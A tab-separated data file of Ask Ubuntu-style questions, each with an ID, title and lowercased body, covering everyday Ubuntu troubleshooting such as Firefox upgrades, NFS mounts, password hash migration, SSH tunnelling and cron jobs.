49942	executable execution path . does it depends of the place the executable is called from ?	as i 'm still a new linux user , i still discover some behaviours and i 'm unable to tell if they are `` normals '' or not . i searched the internet but as i ca n't really find an answer i guess it 's time to ask here . few weeks ago i installed a small game called `` machinarium '' and i played it ... but few days later when i wanted to continue my game i was unable to make the game start correctly . and as i did n't had the time to search i given up . but yesterday as i was working on a program of mine , i had the exactly same behaviour . so i searched a bit and i discovered that when using nautilus with the `` list view '' , i was able to run the program ( ie : the program does find the sound , images etc resources ) when i was literally `` inside '' the executable folder , but unable when i was in a parent folder and expanding it to the executable folder to run it . to illustrate the behaviour here are two screen shots . it does n't works if the executable is double clicked from here it does works if the executable is double clicked from here this is indeed the same `` place '' , but the nautilus view is slightly different as the current folder is not the same and it seems to make a difference for the program . furthermore , when i create a menu items via system settings/main menu to the executable , it behaves just like if the executable ca n't find the resources ( that 's why i was unable to play machinarium the second time as i created a menu short-cut after my first game ) . so i asked my program to generate a text file at it 's root when running , and i started to launch it from different `` parent '' folders to see where is generated the text file . each time the file was generated on the top folder of the current nautilus view . i was expected to see it appears in the same folder of the executable ( well not as i was guessing what as happening , but before that i would have expected to see it appears in the exe folder ) . does anyone can explain me why it does works like this ( i guess it 's normal ) ? how i 'm supposed to solve this when creating programs ( should i detect the executable path in my c++ code or should i organize the resources files another way than on windows ? )
49944	allow shutdown/restart if logged in another terminal	i have natty installed . how to allow shutdown/restart if another user is logged in another terminal , for example using ctrl-alt-f1 ? i 've tried to add the following lines in /etc/sudoers : user all= ( root ) nopasswd : /sbin/reboot user all= ( root ) nopasswd : /sbin/halt user all= ( root ) nopasswd : /sbin/shutdown and sudo chmod 750 /sbin/shutdown sudo chmod 750 /sbin/reboot or create /etc/shutdown.allow but it does n't help and i still get gnome login mask .
49946	switch from encrypted partition to unencrypted ( error : cryptsetup : evms_activate is not available )	i initially installed ubuntu 11.04 with an encrypted file system ( from the alternate install cd : guided partitioning , lvm encrypted ) . now i wanted to change this setup to have my root file system on an unencrypted partition . i had the following setup before : /dev/mapper/my-root on / type ext4 ( rw , noatime , errors=remount-ro , commit=0 , commit=0 ) /dev/sda1 on /boot type ext2 ( rw , noatime ) i backed up / , reformatted /dev/sda5 ( which had contained the encrypted lvm device ) to an ext3 partition , and restored / to that partition . i edited /etc/fstab , removed the line /dev/mapper/my-root / ... , and added the line : /dev/sda5 / ext3 noatime , rw , errors=remount-ro , commit=0 0 1 i edited /etc/crypttab , and commented out the single entry . on reboot , i get the grub screen as usual , but then i get the message cryptsetup : evms_activate is not available , waiting for encrypted source device . i tried reinstalling grub2 using a livecd with the chroot method , but that did n't make any difference . why is ubuntu still searching for an encrypted device ?
49949	how does home folder encryption work ?	back when ubuntu first sported home folder encryption ( what , around the time of jaunty jackalope ? ) , i opted in . that caused me some grief when i decided to change my login password . i found that i could n't decrypt my home anymore ! in trying to fix this , i eventually muddled things to the point that using my old password did n't work anymore , either . that experience has left me very shy of using an encrypted home directory -- nevermind the performance hit of encryption . has this feature become more `` stable '' since it came out ? does it break if you change your login password ? has your [ more recent ] experience been better ? ( does it work in natty narwhal ? )
49951	manually start lamp server	i setup a lamp server on my desktop ubuntu install for testing web applications . how do i set it to only run when i tell it to rather than at startup ? it is not used as a production web server but instead for testing php scripts i write before pushing them to my public web server .
49958	how to find the number of packages needing update from the command line ?	i 'm working on some system admin automation using fabric and i 'd like to be able to monitor the number of packages that need upgrading on a given machine . this is the same information that i can see when i first log in to a machine , i.e . this part : 35 packages can be updated . 22 updates are security updates . is there a command that i can run ( preferably without sudo ) that gives just that information ? i 've looked at the apt-python bindings , but they seem to have a high learning curve and they also appear to be changed around a lot -- i 'd like something that will work at least as far back as lucid without needing to do different things on different ubuntu versions .
49963	fixing /etc/shadow with md5 passwords to sha512 passwords	i recently upgraded an ubuntu server with many users to a recent version from a version from 2008 . the server used to use md5 password hashes ( e.g. , the shadow passwords began with $ 1 $ ) and now is configured to use sha512 . i 'd prefer to keep using sha512 , but would like the old users to be able to partially login once with their old password and then be forced to update their password ( even if its the same password ) generating a sha512 . right now , the old md5-based passwords in /etc/shadow wo n't let the user login at all ( and just appear to be incorrect passwords ) . this seems like plenty of people should have had to do this before ; yet i ca n't see how to do it , looking in the common places like /etc/pam.d/common-password nad /etc/login.defs . also users will be logging in via ssh ; and i do not have everyone 's contact info ( email or otherwise ) ; and some login fairly rarely . any help ? ( googling does n't seem to give any good solutions ) .
49964	how can i install firefox 5 on ubuntu 11.04 ?	i 've seen firefox 5 has been released . how can i install it for ubuntu 11.04 without deleting my current firefox 4 ?
49966	how do i downgrade a package ?	i just upgraded to firefox 5 to find out that selenium does not work on it . i 'd like to downgrade to firefox 4 but have n't found a way to do this . how do you downgrade to firefox 4 on 11.04 ? thanks in advance .
49971	no global application menu for aptana studio 3	i installed aptana 3 in ubuntu 11.04 , unity and found the global menu integration is not proper . how can i have global menu support for aptana ?
49972	how do i share files with someone who does not have a ubuntu one account	i tried to search for an answer , except that , uhhh there is no search . i want to share a ubuntu one folder with people who do not have a ubuntu one account . is that possible ? i found this answer in the faq , `` yes ! since ubuntu 10.04 lts , ubuntu one supports sharing files publicly . right click on a file already synchronized by ubuntu one and select `` publish via ubuntu one '' . right-click on the file again and select `` copy ubuntu one public url '' . you can now paste the url and share it with whoever you want . '' that does n't seem to help me with 11.04 . there is no 'publish via ubuntu one ' button in 11.04 . does anyone know if there is a way to share files with non-ubuntu users ? if so , how ? thanks in advance , bob
49974	upgrade from 10.04 to 11.04 , must maintain minimum kernel 2.6.38	i have a machine running 10.04 and am using btrfs with lzo compression . i upgraded the kernel to 2.6.38 to enable this ( using a ppa ) . i have my /home folder on a separate ( 4 tb ) btrfs drive . / is on ext4 . my only complaint with this setup is that it uses the old btrfs tools . how can i upgrade first to 10.10 , then 11.04 as required , when 10.10 uses 2.6.35 ? i do n't want it to crash/choke on mounting /home . will it just let me keep booting the newer kernel i have while upgrading ?
49975	copy a ubuntu install ?	so short story is that i am wanting to grab my ubuntu install , back up to an external disk , delete everything from my hdd , repartition my hdd , put my ubuntu install back . long story is . i finally got my recovery discs , so i do not need to recovery partitions , not the mention my hdd is kinda messy , so i am going to wipe it and put everything back . thing is i do n't want to have to re-install everything , i would rather just copy/paste my ubuntu install if possible . oh , what i should also mention is that i will be dual booting windows !
49978	mounting nfs directory causes creating zero byte files	i have two servers , server x ( ip 192.168.1.1 ) and server y ( ip 192.168.1.2 ) , both of them are ubuntu 9.1 i have created varnish load balancer on them for my drupal website ( pressflow 6.22 ) i have mounted a directory of imagecache from server x to y as below @ x : /etc/exports == > /var/www/proj/htdocs/sites/default/files/images 192.168.1.2 ( rw , async , no_subtree_check ) @ y : /etc/fstab == > 192.168.1.1 : /var/www/proj/htdocs/sites/default/files/images var/www/proj/htdocs/sites/default/files/images nfs defaults 0 0 also i made this on server x x : /var/www/proj/htdocs/sites/default/files $ chmod -r 777 images i tried to touch , rm , vim , and cat > files in images directory that has been mounted on y and everything went fine . now , always when server y 's imagecache tries to create an image in images directory , the image is created with zero byte file size . anyone face the same before ? any idea of how to fix this problem or what might cause it ? thanks for your help
49988	folders in home appear all over desktop	i have just installed ubuntu 11.04 , and i am surprised to see icons cluttering up my whole desktop . all the folders and files under home are represented . but if i delete the icons , the folder or file itself is deleted - the icon is not just a link . how can i clean up the desktop ? none of the screenshots advertising unity look like this .
49991	where to report wrong hash sum in an ubuntu update failure ?	the firefox update fails because the cairo-dock package and five other cairo-dock-packages have an incorrect hash sum and thus can not be downloaded . i can not find any way to report such a problem since `` ubuntu-bug cairo-dock '' tells me that such a package does not exist . very frustrating . bernhard
49998	how to make powertop `` device power management '' suggestion permanent ?	when i run powertop on my laptop i get following suggestion : suggestion : enable device power management by pressing the p key doing this results in considerable saving in power usage and i would like to make it permanent but i have no idea what this option really does or how to make it permanent . currently i have to run powertop each time i want this option enabled .
50003	file rollback in u1	we have an xls file that has been corrupted ( we use libreoffice and it appears that some sort of corruption has taken place ) . the corrupted file then synced to u1 . is it possible to rollback or restore earlier versions of a synced file ?
50004	location of `` connect to server ... '' mount	if i mount a windows share using the `` places > connect to server ... '' option where is it mounted and is it always mounted at the same place ? i need to know the path so i can access it from the terminal .
50006	getting a conexant cx23885 tv capture card working	i 'm new to linux , and am trying to get my capture card working on 11.04 . the only command that i know to run to find out any information is lspci , which tells me that i have 02:00.0 multimedia video controller : conexant systems , inc. cx23885 pci video and audio decoder ( rev 04 ) i 've looked at using me tv , but have n't worked out how to configure it for my card , or what i need to do to get it running . i 'm not fussed on what software i use to run the capture card , but i 've currently got only me tv installed . edit : when i run tvtime , i get the following errors : videoinput : can not open capture device /dev/video0 : no such file or directory mixer : find error : success mixer : ca n't open mixer default , mixer volume and mute unavailable . mixer : ca n't open device default/line , mixer volume and mute unavailable . segmentation fault
50008	how do i make firefox 5 localized ?	before upgrading from firefox 4 to firefox 5 , my interface was dutch . after the upgrade , it suddenly became english . is this a bug in firefox 5 or am i missing something ? output of apt-cache policy firefox : firefox : installed : 5.0+build1+nobinonly-0ubuntu0.11.04.1 candidate : 5.0+build1+nobinonly-0ubuntu0.11.04.1 version table : *** 5.0+build1+nobinonly-0ubuntu0.11.04.1 0 500 http : //nl.archive.ubuntu.com/ubuntu/ natty-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ natty-security/main amd64 packages 100 /var/lib/dpkg/status 4.0+nobinonly-0ubuntu3 0 500 http : //nl.archive.ubuntu.com/ubuntu/ natty/main amd64 packagesi u i upgraded from 4.0.1+build1+nobinonly-0ubuntu0.11.04.3 .
50017	can not close the media player of libreoffice	i added a sound from the gallery and now i can not close the integrated media player . i guess it 's a bug but how can i close it anyway ? the small window doesnt have window decorators .
50019	how do i change the desktop background from command line ?	how can i change my desktop background from command line ?
50022	guest os can not see usb even after selecting it in virtualbox	i have the latest virtualbox 4.0.8 ( from the virtualbox website ) , including the extension pack , running on ubuntu lucid 10.04 . my user is a member of vboxusers . the guest os is windows xp ( 32-bit ) . everything works -- except the usb . in the usb settings . i have set the default filter ( to allow all usb devices ) . while the guest is running , i go to devices > usb devices and select the device ( it 's a simple usb stick formatted as fat32 ) . although the device is automatically unmounted from ubuntu , windows xp fails to see it ( normally xp would have a little dialogue about installing a new device and then show the icon to safely remove a drive . it does not do this ) . any ideas how to solve this problem , so my guest windows xp can see the usb stick ?
50023	how to prevent an application from making an upgrade ?	how to force an application to stay on the same current version ? for instance , i do n't want the application to ask for an upgrade in the update manager , ( i know that i can un-check it ) but i do n't want it to show up .
50026	invoke a firefox addon using a command	is it possible to engage an addon using an external command ?
50030	how to update the flash player ?	i 've installed flash player 10.1 to do some tests , now i ca n't go back to the lastest version ( 10.3 ) . i 've gone to the flash download page , downloaded and installed `` apt for ubuntu 10.04+ '' , but it 's still showing `` 10.1 '' at playerversion.com . in both mozilla firefox and google chrome . any idea how to solve this ?
50033	unity gui pauses/freezes for less than a few seconds	i 've just got my new lenovo thinkpad x220 with intel hd graphics ( i 'm not sure what the chip is ) and i 've installed natty . everything works great out of the box , except there are short pauses/freezes in the ui that randomly occur , they last less than 2 seconds , actions are still taking place in the background ( like typing ) when the ui un-freezes i can see the characters i 've typed , the app i 've clicked , loaded . i can confirm that this is only happening with the new natty 3d interface , i 've tried 2d and the classic interface and there were no issues . googling this topic seems challenging as i ca n't relate the problem in keywords . and i keep getting results relating to full gui freeze which i do n't have . this is troubling since i have natty 3d running on older machines without any issues . i wonder if anybody else have experienced this or came across this issue before . thanks .
50035	how to open the terminal ? ( mis-configured the profile )	i am quite new to ubuntu . ( i started to use ubuntu about a year ago , but i do n't know how to use things like terminal well . all i used by console was easy things like ls or cd , to use gcc . ) today , i found 'profile ' property of the terminal , and i created a new profile . then , i changed some properties like font color and opacity . soon , i found something like 'command ' , and for test , i set that to ls . i closed and re-opened the terminal . however , the terminal terminates right after it appeared . i soon remembered that there was option like 'close right after the command is executed ' . therefore , i ca n't use gnome terminal d : ... i found konsole at ubuntu software center , but that 's just not my style ( especially cursor , its position is little weird ... ) . question : how to change the profile of gnome terminal , without opening it ?
50043	why does n't cron complete my script ?	i have a backup script ( rsync via ssh ) which is run by cron ( configured in /etc/crontab ) 0 2 * * * root /bin/bash -- login /opt/aebackup/sshbackup.sh if i run it as logged in root like following it runs prefectly fine . root @ server : ~ # /opt/aebackup/sshbackup.sh if i run it via cron it would just stop after a while ( not always on the same task in the script.. it seems pretty random , like the process is killed at some point randomly ) does anyone have an idea why my cron would do that ? thanks for anything ... i 'm desperate !
50045	how to enable libreoffice presentation console on libreoffice impress ?	yesterday i browse on synaptic and found this extension libreoffice-presenter-console i found this extension very helpful for me in my presentation in front of my class so i installed it , but i do n't know how to enable this feature it is there anyone know ? thanks
50047	metacity used with proprietary driver and proposed repository	i enabled the proposed repository in a fresh install with the proprietary nvidia-173 driver . after the reboot , i noticed that minimizing and maximizing , there were none of the expected effect ( using ubuntu classic , even with proprietary driver , unity does not work - another issue ) . furthermore i confirmed by trying to switch workspaces using keyboard shortcuts , and the square desktop wall was replaced by horizontally lined workspaces of metacity . of course , the upgraded compiz could be responsible , but i ca n't figure out what to do - please advice . additionally , if it 's an issue with the softwares from proposed repo , how and what do i do to notify the developers of the issue ?
50049	how to use american english spelling dictionary in firefox ?	my firefox spellchecker was complaining this morning that i spelled 'neighbor ' in the american english style , not the british english style ( 'neighbour ' ) . same is true for color ( colour ) , analyze ( analyse ) , etc . i 've checked in the edit- > preferences- > content- > language tab , and en-us is selected . i also found this link here : http : //ubuntuforums.org/showthread.php ? t=1013043 suggesting that there 's some kind of system panel i can use to ensure that i 've got the right language , but i ca n't see where that is ( i guess that 's for an older ubuntu that let people get to system settings ) . so either the dictionary for firefox for en-us is corrupted , just a copy of the british english dictionary , or somehow the setting is n't propagated properly . how can i get the american dictionary back ?
50051	how do i prevent having to log in on 3 separate prompts every time i start my machine ?	ubuntu 11.04 natty narwhal , ubuntu classic desktop each time i start my machine , i have to log in 3 times . i spent a week in irc > freenode > # ubuntu and got nothing but condescension . i 've searched on the official ubuntu fora for similar problems , tried every recommendation , and still get 3 login screens . as a workaround , i have reset login such that i get a login screen at startup , which i 'd prefer not to get since this machine is accessible by no one but me , physically . i have gone into system > preferences > passwords and encryption keys , set first 'passwords : default ' to 'default ' and unlocked it , and unlocked the 'passwords : login ' key , too . next , since that changed nothing , i set 'passwords : login ' to 'default ' , and checked to make sure it was still unlocked . again , no change , still get 3 login prompts at startup . i 've checked twice to insure that i am the owner of the files ; i am . at the suggestion of several people in # ubuntu , i 've deleted first one , then the other password key in 'passwords and encryption keys ' . still get 3 login prompts . i changed from the unity desktop to ubuntu classic . while that did n't fix the above problem , it is a much more elegant desktop than unity , and i 'll keep it . from what i 've read , this seems to be a seahorse issue , but beyond that , no one seems to have a solution that works . i 'm lost . this should n't be this difficult or annoying . i 'm trying to help our local old time music collective get their machines switched over to ubuntu in order to save them some money which they can use to promote their drm-free music . but from what i 've seen of ubuntu so far on my own machine , i ca n't really recommend that they make this switch . i hope to be proved wrong on that point . but as it stands , if i was out of town or out of country and they ran into a problem , they 'd have no way of fixing it as they 're all less experienced than even i am . i 'm not trying to cast aspersions on ubuntu or linux , but it seems pretty clear that knowledgeable , helpful support for ubuntu is lacking barring any desire on the problem-experiencing-user 's part to avoid condescension . having worked with , and run , several non-profits over the past 20 years , i know that getting volunteers to act professionally can be like herding cats . but an organization 's reputation can be denigrated by sarcastic behaviors on the part of those who serve , effectively , as its public face . thank you all for your help and support . now ... does anyone have a solution to my problem ?
50052	`` fixing recursive fault but reboot is needed ! '' during installation	i 'm a big fan of ubuntu . i 've installed it on every computer i had . but they were always 32-bit computers . and i 've never had an experience with 64-bit computers . i 've made a live usb and cd but with both i get the same error : fixing recursive fault but reboot is needed ! hardware specification : toshiba sdatellite l645d . amd turion ii p540 dual-core processor . 2.40 ghz . 4.00 of ram .
50061	whats new in firefox 5 ?	i tried the support sites in mozilla and could n't find any info about whats new in firefox 5 , so i thought i would see if you guys could point me in the right direction . my system was upgraded to fx5 last night ( 6/21 ) and i have been able to find any info on it ?
50064	reverse port tunnelling	i need to show somebody a website running on my local machine tomorrow . normally i 'd accomplish this by port forwarding on my local router but thanks to the miricle that is failing hardware and its replacement being awful , my current router does n't let me do port forwarding . so stuck with this delay and not wanting to push the whole thing onto a proper server , i had a crazy idea : can i just forward my port to an external server over ssh ? i 've done port tunnelling before but i usually do it the right way around : i connect to a remote box and ask that port 12345 shows up on my local machine at port 12345 . i start something on p12345 on the remote machine i can access it via localhost:12345 what i want to do : connect to a remote pc and ask that that its local p12345 fetch things from my local p12345 ( over the tunnel ) i start something on my local computer on p12345 other people can access remote:12345 and see my localhost:12345
50066	how to build a dynamic grub on a usb-drive ?	i would like to setup grub on a usb where it detects automatically the available os installations on the machine that it is plugged into ... this could be useful if you messed up your default grub menu on a computer and would like to boot into the machine w/out booting live-os . or if you have multiple live-os installations on a usb-drive and would like to add/remove different installations w/out needing to update grub manually . i know that grub2 has a os-prober feature that looks for other installations on the hard-drive , but will that work in either of the scenarios listed above ?
50067	howto save alsamixer settings ?	hello i have tryed out the programm `` earcandy '' , now i had/have a lot of problems . at first i did not get any sound and now it is very low volume . ps earcandy is now deleted from my harddisk . when im opening the alsamixer with : alsamixer i see that the volume for the speakers is zero . now i push it to the max volume . but after every restart , i have to open alsamixer again and have to set the volume to max again . can i save the settings for alsamixer or is there any other way to fix the problem ?
50070	is there an equivalent to google sketchup ?	i would like to know the various tools available in ubuntu similar to google sketchup . i dont like to install sketchup using wine in ubuntu .
50077	how to get a list of preinstalled packages ?	and i 'd like to get this list directly and if possible from an external source ( maybe repositories ? ) . almost all one-liners i have found did n't work for me . so i hope there is an indicator somewhere that denotes packages as `` preinstalled '' . ps : i do n't want to run a clean installation in a vm .
50081	sigmatel sound card not working on an dell xps m2010	i 've installed ubuntu 11.4 on my dell xps m2010 using wubi . then booted up and could not connect to the internet using 3three huawei e122 usb mobile broadband ( i would like this to work also ) . i 've managed to connect through a wireless network , i went to my favorite sites and was told i needed to install adobe flash player.this what i did players run and picture is good . but there is no sound ! then i 've tried to play songs in banshee , but no sound . i have checked everything in sound preferences including test speaker , there is sound . i have sigmatel sound card . thanks
50084	ubuntu gitosis init web folder	i managed to setup gitosis on ubuntu , authorization done using ssh keys . now i want to make some folders on this ubuntu server git initialized and available thrue gitosis . for example /var/www/x1 folder . it is web page i 'm working on , and would like to see changes made available public ( this is /var/www example for .. or simbolic link ) . gitosis created his folder structure in /srv/gitosis/repositories/ . i expected to see files which i commited/pushed on server in this folder , but there is only some weird file structure made . i hope someone understood what i was trying to ask . hoping for some quick and easy fix . thank you .
50085	setting the working directory	i want to create a quick launch icon for matlab , but it wo n't start if the working directory is not the same as the directory where the executable is . can i specify the working directory in the 'custom application launcher ' ?
50087	why is n't it possible to run mac software ?	i wonder why there is n't any equivalent of wine for running mac software on ubuntu . thoughts ?
50089	synaptic pakckage manager not working on 11.04	on opening the package manager i get the error e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . i have done both sudo apt-get update & & sudo apt-get upgrade . at the end of update i get the error e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . my_username @ my_username-inspiron-560s : ~ $ sudo apt-get upgrade reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : the package lists or status file could not be parsed or opened .
50092	how to uninstall 8.10 while keeping 11.04 ?	yesterday i installed ubuntu 11.04 with 8.10 already installed and since then my dell vostro laptop gets shuts down automatically every half an hour . although i am using the latest version ( currently 11.04 ) i did not uninstall 8.10 while ( as per the guiding option of ubuntu ) . since this installation i am facing the sudden shut downs often . hence i want to remove the older version from my system . how can i do this ?
50095	revert back to old style slidebars to get rid of the transparent slidebars	sorry not sure if this is the right place to post this . i 'm trying to get rid of these annoying transparent slide bars i want the old style slide bars back . i run ubuntu classic desktop its not classic its been modified . basically those of us that feel like i do needs a way to install old-style gnome2 . i think that would stop 90 % of the complaining about natty . if there is a way to revert back to the old sytle slide bars please could you let me know how . i would even settle for getting gnome3 installed with no transparent slidebars .
50101	how do i remove the lamp stack so i can start over ?	i 'd like to start over with my webserver and i 'd like to reinstall all the lamp packages , how do i do that ?
50104	how do i access an external drive mounted on a machine on my own network ?	i 've got one desktop computer ubuntu 11.04 with an external usb drive mounted on it on the home wrt54l linux network ( 192.168.0.2 ) , and when i arrive at home with my laptop , i want to be able to mount the external usb drive from my ubuntu 11.04 laptop ( 192.168.0.3 ) to the desktop , without having to unplug it from the desktop , that is accessing it . is it possible to send , via a terminal command , a remote mount command to the desktop usb drive from my laptop ? ideally something that creates a local mountpoint i can just call locally from the programs installed in my laptop , like : username @ laptop ~ `` mount the drive so the laptop can see it '' username @ laptop ~ ./myprograminlaptop /my/file/which/is/actually/on/the/desktop/file.txt can i automate this process every time the laptop is connected to the home network ?
50108	how can i get flash working on kubuntu 11.04 64bit ?	flash is not working on kubuntu 11.04 , 64bit on any browser . even after a purge and reinstall , any flash application gives either says the plugin is missing or not up to date ( depends on browser ) . this problem is just with kubuntu , not with ubuntu . how can i get flash working again ? after installing the package flashplugin-installer , the command find / -name `` libflashplayer.so '' does n't find anything . update december 29 , 2011 manual install is no longer necessary . the package adobe-flashplugin works as intended . if you used the script i originally provided , you 'll have to do some clean up to get things working correctly again . see the now edited post for a script to do the clean up . note that i had to completely remove and reinstall chrome to convince flash to work in chrome again . update june 22,2011 i fixed it by manually installing flash . i posted my script and made it a community wiki so it can be improved upon .
50112	how can i delete duplicate emails in evolution ?	how can i delete duplicate emails from evolution 2.32.2 ?
50126	blender has weird fuzzy misbehaving icon in launcher	i got blender 2.58 ( stable ) from blender.org ( downloaded the package , extracted it ) . everything works fine , but the only thing that bugs me is that the icon in the launcher ( when i open it ) is really fuzzy . i guess that 's no big deal , but when i select `` keep in launcher '' and close blender , the icon does n't work when i try to open it again . then , i created a launcher on my desktop with the path to the blender executable , slapped on a shiny new non-fuzzy .svg icon that came with the package , and dragged the ( desktop ) launcher to my ( unity ) launcher . now , when i click on the new launcher , it keeps showing the flashing thing that says it 's opening the program , and then the old fuzzy icon comes back but does n't replace the new icon . even after blender opens , the new icon is still flashing . what is wrong with my launcher ?
50128	how to setup ipsec with amazon ec2	how to setup an ipsec connection from my ubuntu laptop to amazon ec2 instance ? i tried setting it up using elastic ip and vpc with the following openswan configuration but it is not working . conn host-to-host left= % defaultroute leftsubnet=ec2privateip/32 # local netmask leftid=elasticip leftrsasigkey= connaddrfamily=ipv4 right=1laptopip # remote ip address rightid=laptopip rightrsasigkey= ike=aes128 # ike algorithms ( aes cipher ) esp=aes128 # esp algorithns ( aes cipher ) auto=add pfs=yes forceencaps=yes type=tunnel
50129	error while trying to install msgpack	i 'm trying to install msgpack to be used with php , by following the wiki guide . but when i run sudo ./configure i get this error : checking php version ... configure : error : need at least php 5 or newer when i run : php -v : php 5.3.5-1ubuntu7.2 with suhosin-patch ( cli ) ( built : may 2 2011 23:18:30 ) any help ?
50132	battery does n't charge on high cpu load	when my cpu load rises the battery stop working i do n't know why i.e if i start playing a game such as counter strike source the battery wo n't change unless i minimize the window which brings the load down . can someone please help me with this issue ? note : sometimes when flash lags for a sec it shows discharging and charging again also due to high cpu load . my laptop is a sony vaio f series 127fd model . thanks
50133	configure a cron job to run only if laptop is plugged in ?	i 'm setting up a cron job to update my nmzmail database periodically , but i 'd like the cron job to execute only if my laptop is plugged in . is there a way to do this ? if there 's not a built in cron command , then is there a way to check via the command line that i could use in a simple script ?
50136	is it possible to have duplicated folders on /home folder new partition as an error ?	i move my home directory to it 's own partition but i end with what it seems to be a duplicated home folders ( there are 2 accounts admin and everyones account ) i have `` admin and everyones '' folders and then i have in hide `` .ecryptfs '' inside i had again `` admin and everyones '' folder inside there is .encryptfs and .private inside each account cant read it 's content as seems encrypted . which of both folders i 'm able to delete the ones inside .encryptfs or the other showing in unhide mode `` admin and everyones '' ? it seems is duplicated as have the same file size .
50140	configuring an engenius 3500	the title speaks to only half of the issue : the other half are the settings in ubuntu and the sequences therein . the computer in this issue does receive internet with the external antenna jack at the back being fed with a simple magnetic base antenna designed for putting on the roof of an automobile . however , that signal is weak and the engenius with an external antenna ( rootenna ~15db gain ) and ehternet wire will supply a stronger , faster signal . i 've set the engenius to the desired source and entered the correct wep password . the lights on the engenius indicate that it 's connected to the access point . at the ubuntu side of this i 've worked to no avail changing settings with `` edit connections '' to the point i 'm ask ( ing ) ubuntu for help . i have and have rtfm for engenius 3500 there is an embarrassing side note to this issue : at one time i had the engenius working ! it seems that i ca n't recall the settings and sequences i used way back when . and i may as well confess to not knowing the command line . i 'm a gui guy .
50141	how to remove firefox from update manager ?	i uninstalled firefox some days ago , because i use another browser . it appeared yesterday as an important security update . i can uncheck every package associated with it , and install the remaining updates , but it just keeps showing up , and it 's a little annoying . how can i disable it , so it wo n't show up again in the update manager , unless i chose to reinstall it ? thanks .
50143	how large of a swap partition is needed to hibernate ?	i 've read this question , but it does n't definitively answer my question . if i want my computer to be able to hibernate , do i need to have a swap partition as large as my ram , or will ubuntu wisely be able to hibernate if the swap partition can fit the currently-in-use ram ? i 'm about to install ubuntu on a computer with a lot of ram , and a relatively small hard drive , so i do n't want to use more hard drive space than necessary . i wanted to avoid giving my actual specifications to keep this question more general , though i 'll give them if necessary .
50144	how to install a lexmark z600 series printer ?	it has been a headache trying to install this printer . all the tutorials i found are for older versions of ubuntu , and none of them work . how can i install this printer ? edit : howto : install pita lexmark z600 z615 and dell photo printer 720 setup lexmark z600 and x series printer on ubuntu ( i tried this one , only that it was translated to spanish , but it was the same instructions ) howto : lexmark printers i always get an error when extracting the converted tars with all of the tuts , invalid argument or the file does n't exist . looks like , i was missing some ia32 libs .. and that caused the errors with the tar files , anyways i still ca n't print now i get this , cups-insecure-filter how to install lezmark z600 series printer here , the op offers 2 debs , i installed them on a 32 bit ubuntu install , now the printer gets recognized but still ca n't print , 'cause i 'm missing a filter , `` rastertoz600 '' .
50145	how to install `` perf '' monitoring tool ?	could someone help me to install perf monitoring tool , please ?
50146	is there a command + ` equivalent ( cycle through windows ) ?	on the mac , i use command+` ( the tilde ) to cycle through windows in the current application ( eg terminal or chrome ) . it 's like alt+tab except only for the current application 's windows . possibly for compiz but without any flashy exposăš like graphics ?
50149	how can i limit the number of open af_inet sockets ?	is there a way to limit the number of concurretly open af_inet sockets ( only ) ? if so , how do i do it , and how will the networking behave if i 'm above the limit ? for background : my cheap commodity router is a bit eager to detect 'syn flooding ' . when it does , it crashes ( and does n't automatically restart itself ) . i 'm thinking limiting concurrent connections to around 1000 should keep it from bickering .
50153	how to install new system ( with new applications ) without removing /home	i 'd like to update to 11.04 from 10.10 ( but i do n't like upgrading system , i prefer full reinstalling ) i 'd like to install whole new system , but i want to keep my /home folders ( music , movies , documents and so on ) . if i keep /home while installing - this will keep all my program settings too ( but i have lots of trash there too , and 'd like to clean it too ) . can i delete all .folders in /home and then reinstall system ( keeping old /home ) ?
50154	how do i get gnome-terminal not to truncate lines ?	i have a huge xml file which i want to look at with cat some.xml | less but the gnome terminal truncates the lines making it difficult to read the output . how do i get gnome-terminal not to truncate lines ? or , is there a better way to scroll through files too big to fit in memory ?
50159	is banshee ( or other mono applications in ubuntu ) threatened by the recent changes in novell ?	please inform if the question is off-topic to remove it . i do not know if i should work with banshee or some other applications since i am afraid that their future is threatened if mono stops developing . an example : http : //www.zdnet.com/blog/open-source/is-mono-dead-is-novell-dying/8821 . are my fears reasonable ?
50160	synapse vs. kupfer , which is lighter for you ?	for me synapse idles at approximately 7mib , kupfer at 23mib . that is with nearly all except four plugins off for kupfer . i thought it was supposed to be the lightest and i love the plugins for it . i used to be a die hard gnome-do fan , then i switched to synapse when it lost development because i heard a developer from do went to synapse . i want to like kupfer more but if the memory consumption could match synapse i 'd be sold .
50161	which linux distro is great for my old computer ?	can you suggest me some linux distros made for old computers ? my old pc config : pentium 4 - 2.3 ghz ram - 512 mb hd - 80 gb : d
50165	simple script - execute command on selected file	i want to make a script that will execute .jar file on selected file . later i will add that script to right-click menu via the tool nautilus actions or just place it into nautilus-scripts folder . i have a problem creating script . when i am in a usual console screen and want to execute this jar file on any other file , i use this syntax myfile.jar ./someotherfile.xml and the jar file will write the output to the console screen . so i created a file script.sh , added lines in it # ! /bin/bash /home/username/myfile.jar $ 1 but it does not output anything . i know i am doing something wrong . please help . to sum , i need a script that will use selected file as a parameter , open the gnome-terminal , inside that terminal it will start jar file and pass it the selected file . i am confident that this is a very simple procedure , but i am total newbie with shell scripting .
